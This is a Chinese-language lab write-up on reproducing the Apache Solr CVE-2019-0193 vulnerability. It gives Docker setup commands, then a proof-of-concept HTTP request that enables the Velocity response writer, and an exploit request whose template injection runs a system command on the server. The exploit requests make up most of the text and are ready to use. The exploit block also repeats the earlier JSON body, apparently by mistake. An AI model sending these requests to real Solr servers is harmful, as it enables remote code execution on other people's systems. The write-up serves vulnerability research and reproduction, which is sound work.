Apache Solr CVE-2019-0193 环境搭建漏洞复现

受影响版本

步骤

Apache Solr < 8.2.0

docker pull scxiaotan2/apache-solr:cve-2019-0193 # 拉取镜像
docker run -it scxiaotan2/apache-solr:cve-2019-0193 /bin/bash #启动shell
./start.sh #启动根目录下的服务
netstat -tlnp #可以看到8983端口启用了

前提：

攻击者需要知道Solr服务中Core的名称才能执行攻击。

poc

post /solr/core1/config HTTP/1.1
Host: 172.17.0.2:8983
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.0.2/solr
Connection: close
Content-Length: 222

{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }

exp:

post /solr/core1/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: 172.17.0.2:8983
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.17.0.2/solr
Connection: close
Content-Length: 222

{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }

声明：

本文中提到的漏洞利用Poc和exp仅供研究学习使用，请遵守《网络安全法》等相关法律法规。

参考链接

https://github.com/scxiaotan1/Docker/tree/master/CVE-2019-0193
https://github.com/1135/solr_exploit